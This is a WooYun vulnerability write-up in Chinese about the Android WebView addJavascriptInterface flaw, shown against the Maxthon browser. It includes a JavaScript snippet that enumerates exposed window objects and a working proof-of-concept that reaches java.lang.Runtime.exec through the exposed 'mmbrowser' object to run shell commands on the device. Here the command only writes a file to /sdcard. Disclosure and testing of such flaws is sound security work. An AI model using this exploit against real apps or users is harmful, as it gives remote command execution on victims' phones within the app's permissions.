WooYun.org

安卓开发使用 WebView 组件中的 addJavascriptInterface 方法可以把 JAVA 中的方法公开给 JavaScript 调用，但是 JavaScript 在调用该方法的时候又可以反向把 JAVA 代码注入到 JAVA 代码中去执行，既然能够执行 JAVA 代码，这就产生了远程命令执行漏洞，然后就可以在权限范围内对手机做任何事情。
算了不扯了，关于这个漏洞的相信信息请参考下面文章：
http://50.56.33.56/blog/?p=314
http://drops.wooyun.org/papers/548
我觉得这种漏洞的利用有以下条件：
1、客户端应用程序有通过 addJavascriptInterface 公开 JAVA 方法以供 JavaScript 调用（好像是废话哦）；
2、用户通过客户端访问的页面内容必须是可控的，并且通过 WebView 组件来完成的；
对于这个漏洞最好的检测方法当然是反编译 apk 文件，查看然后测试了。
我觉得累，这里就拿傲游浏览器来快速对这个漏洞进行测试，过程如下：
1、在安卓手机上安装好傲游浏览器（又是废话）；
2、浏览一个页面，内容如下：

<script type="text/javascript">
for(w in window){
    document.write(w + "<br/>");
}
</script>

上面代码会遍历所有的 window 对象然后打印到页面上；
3、通过对返回的 window 对象进行目测判断是否存在该漏洞，比如傲游返回的内容：

可以大致判断 mmbrowser 是公开出 JavaScript 调用的（不见得都是对的）
4、构造 POC：

<script type="text/javascript">
function execute(cmdArgs)
{
    return mmbrowser.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
}
try{
    execute(["/system/bin/sh","-c","echo 'maxthon browser for android remote command execute' > /sdcard/maxthon.txt"]);
    alert("good job!");
}catch(e){
    alert(e);
}
</script>

5、访问看效果